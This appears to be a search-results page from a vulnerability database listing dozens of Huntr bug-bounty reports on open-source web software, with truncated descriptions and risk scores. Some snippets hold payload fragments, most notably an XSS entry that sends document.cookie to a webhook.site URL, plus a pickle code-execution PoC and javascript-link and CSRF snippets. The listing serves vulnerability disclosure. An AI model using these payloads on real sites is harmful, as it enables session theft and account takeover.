Lucene search
K
HuntrMost viewed

4072 matches found

Huntr
Huntr
added 2021/01/07 12:0 a.m.16 views

Code Injection in baidu/cup

Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...

1.2AI score
Exploits0References1
Huntr
Huntr
added 2020/11/18 12:0 a.m.16 views

Prototype Pollution in maikelvl/dot-json

Description dot-json is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...

1.8AI score
Exploits0
Huntr
Huntr
added 2020/09/14 12:0 a.m.16 views

Prototype Pollution in pierreinglebert/json-merge-patch

Description json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following Po...

1.7AI score
Exploits0
Huntr
Huntr
added 2020/08/17 12:0 a.m.16 views

Insecure Storage of Sensitive Information in smirzaei/rails-session-decoder

Overview rails-session-decoder is a simple utility for decoding Rails 4.x sessions in Node.js, this package are vulnerable to Information Exposure. Missing verification of the Message Authentication Code appended to the cookies may lead to decryption of cipher text, exposing encrypted information...

2.3AI score
Exploits0References1
Huntr
Huntr
added 2020/07/28 12:0 a.m.16 views

Code Injection in mahdaen/node-import

Overview node-import is a package that imports dependencies and run it directly or concatenate them and exports to file. This package is vulnerable to Arbitrary Code Execution. The params argument of the module function can be controlled by users without any sanitization. This is then provided to...

4.2AI score
Exploits0References1
Huntr
Huntr
added 2020/06/16 12:0 a.m.16 views

Code Injection in strider-cd/strider-git

Overview strider-git allows strider to use any git repository for a project. he issue occurs because a user input is formatted inside a command that will be executed without any check...

4.9AI score
Exploits0References1
Huntr
Huntr
added 2019/08/18 12:0 a.m.16 views

Cross-site Scripting (XSS) - Generic in boxbilling/boxbilling

Overview Boxbilling is a free billing & client management software Affected versions of this software are vulnerable to Cross-site Scripting XSS. It is possible to inject JavaScript with object decoding such as alert1 resulting in XSS. Technical Description if we look in...

1.9AI score
Exploits0References2
Huntr
Huntr
added 2026/02/25 11:32 a.m.15 views

Incomplete Fix for CVE-2026-1669: HDF5 External Storage File Disclosure in Legacy H5 Loading

Description Keras 3 patched CVE-2026-1669 HDF5 External Storage File Disclosure in the new .keras and .weights.h5 loading paths by adding verifydataset to check for dataset.external in H5IOStore. However, the legacy .h5 loading path keras/src/legacy/saving/legacyh5format.py was not patched. This...

7.5CVSS5.9AI score0.00298EPSS
Exploits0
Huntr
Huntr
added 2026/01/13 3:32 a.m.15 views

Integer Overflow lead to DOS in handling Accept-Encoding header in API /v2/models/<model-name>/generate

This report is not public...

5.8AI score
Exploits0
Huntr
Huntr
added 2023/09/28 5:29 p.m.15 views

CSRF Delete Navigation Menu Items

Description CSRF Delete Navigation Menu Items Proof of Concept 1 .Attack sends fake requests to users history.pushState'', '', '/'; document.forms0.submit; 2 .User click, deletes unwanted Navigation Menu Items Payload Poc...

7.1AI score0.0024EPSS
Exploits1
Huntr
Huntr
added 2023/09/13 8:25 a.m.15 views

Store XSS in Widgets and pages in instantsoft/icms2

Description I noticed that you filtered the filter very carefully. But there are still some parts you missed Proof of Concept 1 . Login with admin 2 . Go to "http://localhost/o2/admin/menu/itemedit/18" 3 . Insert payload in CSS class 4 . Click save , and go to home page, and Detect store xss in...

6.8AI score
Exploits0
Huntr
Huntr
added 2023/09/03 2:5 p.m.15 views

Stored XSS in module named "New Submissions"

Description I tested the demo site you provided. I see that there is an Stored XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept Link video Poc https://drive.google.com/file/d/1BaAnaZQyfbUTu54rzwRtTevr-wx100/view?usp=sharing Steps 1 .Login as account...

6AI score0.00411EPSS
Exploits1
Huntr
Huntr
added 2023/09/01 10:54 a.m.15 views

Stored XSS in module named "Create Issues"

Description I tested the demo site you provided. I see that there is an XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept link video Poc https://drive.google.com/file/d/1CEEFO0ukhjug6dNRfb-vdQNuBUyezoJp/view?usp=sharing Steps 1 .Login as account demo ...

6.2AI score0.00401EPSS
Exploits1
Huntr
Huntr
added 2023/08/20 3:58 p.m.15 views

DOM XSS in https://demo.modoboa.org/user/#profile/

Description I noticed, your website is very secure. But you overlooked a flaw DOM XSS. Detail: 1 .Login with demo account. 2 .Go to the link: https://demo.modoboa.org/user/profile/ and click Update 3 .Use burp to block proxy and inject payload in &language: Proof of Concept Video Poc...

4.9CVSS6.7AI score0.00565EPSS
Exploits1
Huntr
Huntr
added 2023/08/17 12:8 p.m.15 views

Improver Validation of File Name Causes RCE

Description Due to insufficient sanitization of the music file name, it is possible to execute arbitrary commands on the victims computer, through a specially crafted file name. Note that this bug was only found exploitable only on the MacOS version of this application. Although still applicable ...

7.7AI score
Exploits0
Huntr
Huntr
added 2023/08/01 4:23 p.m.15 views

Blind SSRF When Uploading Presentation (mitigation bypass)

Description This is actually a bypass of CVE-2023-33176 when i able to perform SSRF to internal network. Proof of Concept As we already know, we can upload files via api /bigbluebutton/api/insertDocument using a remote url. PresentationUrlDownloadServicesavePresentation is the method to handle th...

7.2AI score0.00471EPSS
Exploits0References1
Huntr
Huntr
added 2023/07/21 3:37 a.m.15 views

Insufficient Session Expiration because of lacking of cache check

Description The web application's session management system suffers from an "Insufficient Session Expiration" vulnerability due to the lack of proper cache check. This vulnerability allows a user's session to remain valid even after the user has logged out, potentially granting unauthorized acces...

6.4CVSS6.7AI score0.00507EPSS
Exploits1
Huntr
Huntr
added 2023/07/18 2:27 a.m.15 views

Vim's embedded terminal allows injection via DECRQSS response

Description DECRQSS is a terminal response that replies with certain information about the terminal. Various terminals have bugs where a piece of data from the request i.e. data that the terminal receives is echoed back in the reply. In some cases this is enough to make it so if untrusted data...

7.1AI score
Exploits0References2
Huntr
Huntr
added 2023/06/29 8:45 a.m.15 views

SQL injection in searchArticles function

Description The searchArticles function in the KB module makes a call to the getSimpleResultSet function, with the perpage parameter taken from the user without sanitizing before entering the query, leading to the attacker being able to manipulate the query. Proof of Concept GET...

7.5CVSS6.8AI score0.00922EPSS
Exploits1
Huntr
Huntr
added 2023/06/28 3:50 a.m.15 views

Stored XSS in Title

Description Spina's admin screen has an embedded XSS in the title of the page. By embedding arbitrary JavaScript code in the function of Paguri, arbitrary scripts can be executed on the browser when the administrator user who accessed the page deletes the page. Proof of Concept Step 1. Access the...

4.3CVSS6.4AI score0.00565EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/22 11:47 a.m.15 views

Remote Command Execution by Improper Escaping of Output

Description Improper Encoding or Escaping of Output in Froxlor export configuration. Hackers can use it to create a json file with PHP code inside then trigger the code by set php-fpm to process .json extension. php foreach $POST'system' as $sysdaemon $params'system' = $sysdaemon; $paramscontent ...

5.8CVSS7.3AI score0.00835EPSS
Exploits1
Huntr
Huntr
added 2023/06/15 4:44 p.m.15 views

Server-Side Template Injection leads to Remote Code Execution

Description Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack Proof of Concept Log in as an admin or a staff who has "Mass mailer" permission, edit a message In the "Email content" field, insert the following value and click "Update and preview" %...

5.8CVSS7.3AI score0.01034EPSS
Exploits1
Huntr
Huntr
added 2023/06/12 5:46 p.m.15 views

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

4.9CVSS6.6AI score0.00468EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/09 7:51 a.m.15 views

Stored XSS in Survey Groups Function

Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/05 8:52 a.m.15 views

IDOR can make attackers add or close others' unavaiable

both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...

4CVSS7AI score0.00374EPSS
Exploits1
Huntr
Huntr
added 2023/05/30 9:10 a.m.15 views

missing permission check for API /setting/workspace/member/update

Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息,比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...

6.5CVSS7AI score0.00711EPSS
Exploits1
Huntr
Huntr
added 2023/05/28 11:48 a.m.15 views

Improper Authorization in "Customer automation rules" function

Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...

6.4CVSS6.7AI score0.00444EPSS
Exploits1
Huntr
Huntr
added 2023/04/27 7:6 p.m.15 views

SQL Injection in expenses/ajax.php & loan-management/ajax.php

Description An administrator user can use different operations and parameters to execute SQL queries. -employeeId on operation addMonthlySalary in expenses/ajax.php. -returnAdvancePaymentEmployee on operation returnAdvancePaymentSubmit, in expenses/ajax.php. -id on operation editLoan in...

8.2AI score
Exploits0
Huntr
Huntr
added 2023/04/19 1:30 a.m.15 views

Improper Authorization lead a user can accept his answer as the best answer

Description Login as user A and make a question https://meta.answer.dev/questions/D1C7/how-to-set-my-laptop-auto-start-at-particular-time Login as User B and answer this As normal, User A can vote the answer of User B is best answer But with this vuln, User B can call the api POST...

3.5CVSS6.9AI score0.00462EPSS
Exploits1
Huntr
Huntr
added 2023/04/17 9:16 a.m.15 views

IDOR make users can bind any cluster

Proof of Concept 1 admin create cluster1, cluster2, clusterTag1 and clusterTag2 2 admin add user1 as owner of cluster1,clusterTag1 3 user1 bind clusterTag1 to cluster1 4 user1 use burpsuite hiajck the request 5 the request content can be "clusterTag":"biaoqia4","bindClusters":1 6 change the reque...

5CVSS7AI score0.01182EPSS
Exploits0
Huntr
Huntr
added 2023/04/15 5:57 a.m.15 views

Account Owner Email Adrress Leakage Lead To Improper Access Control

Description hi team, when i try to create users for on https://public.tenant.kiwitcms.org/admin/auth/user//change/ i see that the users are not properly authenticated. i can create users with the same firstname,lastname, and email. normally, when we create the same users it should error with the...

6.8AI score
Exploits0
Huntr
Huntr
added 2023/04/12 8:29 a.m.15 views

Insufficient Filtering Leads to Stored Cross Site Scripting at FAQ

Description Cross-Site Scripting XSS attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a differen...

4.9CVSS5.8AI score0.00552EPSS
Exploits0References1
Huntr
Huntr
added 2023/04/12 7:23 a.m.15 views

Able to change admin email and password without current password validation.

Description Able to change admin email and password without current password validation. Change the User%5Buid%5D for the User UID of the current admin user. for the example: uid of the current admin is 1. Then change the other info like User%5Bemail%5D,User%5Bpassword%5D and passwordrepeat for...

7AI score
Exploits0
Huntr
Huntr
added 2023/04/04 2:50 p.m.15 views

Broken Access Control in Vote/Friend Function

Description Unauthorized conduct by modifying, closing/re open a poll created by someone else. Delete friend of other account via id Proof of Concept Step 1: Use account 1 to create a poll\ \ account 2 not have perrmison edit/close/open on poll \ Step 2: Intercept request when account 1 edit,...

6.7AI score
Exploits0References1
Huntr
Huntr
added 2023/04/02 7:0 a.m.15 views

IDOR make one user can stop, start , delete, edit others' source

Proof of Concept 1 user1 create a source with id =1 2 user2 create a source with id =2 3 user1 delete the source with post DELETE /inlong/manager/api/source/delete/1?sourceType= HTTP/1.1 4 user1 repalce the 1 as 2, and find that he can sucess delete user2' source...

6.4CVSS6.9AI score0.01355EPSS
Exploits0
Huntr
Huntr
added 2023/03/29 8:32 a.m.15 views

Improper Restriction of Rendered UI Layers or Frames

Description The osTicket uses an incorrect method to validate the src attribute of the iframe tag. Although it appears that osTicket restricts domains through a whitelist, attackers can easily bypass this restriction. Proof of Concept This iframe is going to render www.youtube.com.attacker's serv...

6.9AI score
Exploits0References1
Huntr
Huntr
added 2023/03/29 8:24 a.m.15 views

XML External Entity (XXE) injection in sympy

Description Sympy is an open source platform that a computer algebra system written in pure Python . Sympy is vulnerable to an XML External Entity XXE injection in the applyxsl functionality of Sympy due to the usage of etree.XML. Proof of Concept // PoC.py from sympy.utilities.mathml import...

7.2AI score
Exploits0
Huntr
Huntr
added 2023/03/21 4:27 p.m.15 views

Stored XSS via name parameter of "Predefined Properties"

Description It's observed that the name parameter of the "Predefined Properties" functionality is vulnerable to stored XSS. Proof of Concept 1.Login to https://demo.pimcore.fun/admin/. 2.Now go to Settings - Predefined Properties - Add and Enter the payload: " inside the name input field. 3.Then...

4.9CVSS6.2AI score0.00497EPSS
Exploits1References1
Huntr
Huntr
added 2023/03/13 3:58 p.m.15 views

Autenticated Stored Cross-Site Scripting (XSS)

Description Login to the admin account. Use the following URL http://192.168.0.211/admin.php?action=files or navigate to pages - manage files. Upload the XSS payload with “.html” extension. Intercept the request with Burp Suite. Modify the Content-Type to application/x-php and forward the request...

6.1AI score
Exploits0
Huntr
Huntr
added 2023/03/08 10:34 a.m.15 views

Multiple XSS @ answer/question/tag

Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Posting the Question: func req QuestionAdd Check errFields validator.FormErrorField, err error...

4.9CVSS5.5AI score0.00536EPSS
Exploits1References1
Huntr
Huntr
added 2023/02/28 10:45 a.m.15 views

Stored XSS in Notification and Data Management

Description Please enter a description of the vulnerability. Proof of Concept 1. Go to a survey and to Settings = Notifications and data. 2. Turn off Inherit option for Send basic notification email to: or Send basic notification email to: 3. Enter the following payload: " and Save...

6.7AI score
Exploits0References1
Huntr
Huntr
added 2023/02/21 7:28 a.m.15 views

Rxss in msg parameter

Affected url Affected parameter : msg It appear that html tags are rendered in the page via msg parameter. So I tried tag and it work, so i tried adding event handlers in this case onpageshow=alertdocument.domainand it trigred xss. POC :...

1.6AI score
Exploits0
Huntr
Huntr
added 2023/02/20 8:21 a.m.15 views

Race Condition Vulnerability can Leads to Up Vote Stealing

Description I tested in the live production site https://meta.answer.dev/. There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by using race condition vulnerability. Proof of Concept 1. Go to an question and press up vote or down vote. 2. PoC will show...

2.6CVSS6.8AI score0.00405EPSS
Exploits1References1
Huntr
Huntr
added 2023/02/18 4:28 a.m.15 views

XSS in /admin/domains when filtering a specific tag

Description Reflected XSS happens when filtering a specific tag in the Domains page and changing the "domfilter" URL query parameter to the malicious string. Proof of Concept 1 - Login as a domain admin 2 - Go to the Domains page 3 - Click on one of the existing tags 4 - Change the domfilter quer...

4.3CVSS5.1AI score0.00494EPSS
Exploits1
Huntr
Huntr
added 2023/01/15 4:48 p.m.15 views

CSRF, Reflected XSS and Stored XSS in add instance function

Description The add instance function allows to creation of an instance from user input but does not have any sanitizing mechanism which results in a Reflected XSS bug. This feature can be made by any user in the system, including guest users. After creating the instance will be saved on the...

1.2AI score
Exploits0
Huntr
Huntr
added 2023/01/12 2:55 p.m.15 views

Stored XSS in Your Answer

Description Evil users can attack other users or administrator users through this vulnerability, causing other users/administrator user accounts to be taken over Proof of Concept step1. Insert xss payload in the hyperlink of the question answer javaScript:alertlocalStorage.getItem'alui' step2. An...

6CVSS8.5AI score0.00871EPSS
Exploits1
Huntr
Huntr
added 2023/01/04 7:55 a.m.15 views

CSRF leading to delete account

Description wallabag was discovered to contain a Cross-Site Request Forgery CSRF which allows attackers to arbitrarily delete user accounts via /account/delete. Proof of Concept 1. Create a new user. 2. Login as the new user. 3. Open the following HTML file in the browser. html history.pushState'...

3AI score0.00304EPSS
Exploits1
Huntr
Huntr
added 2022/12/22 8:7 a.m.15 views

Critical Account Takeover and Privilege Escalation

Description Critical account takeover and privilege escalation vulnerability allow a low privilege user to take over admin account by using change password functionality. In a normal user, select change password Change the user ID to 1 as it is the admin account user ID Admin account is taken ove...

4.2AI score
Exploits0
Huntr
Huntr
added 2022/12/21 7:56 a.m.15 views

Stored XSS in Search

Description Stored XSS is a type of XSS that stores malicious code on the application. The demo website is affected of it. Proof of Concept 1. Access to the demo website https://demo.usememos.com/ 2. At "Any thoughts....", write XSS Payload and save it. In this scenario, I used payload: " 3. Now,...

4.9CVSS5.3AI score0.00539EPSS
Exploits1
Huntr
Huntr
added 2022/12/18 3:29 a.m.15 views

Multiple Blind SQL Injection Vulnerabilities in Reports

Description SQL injection typically allows an attacker to extract the entire database from the vulnerable website, including user information, encrypted passwords, and business data. This can subsequently lead to mass compromise of user accounts, data being encrypted and held to ransom, or stolen...

7.8AI score
Exploits0References1
Total number of security vulnerabilities4072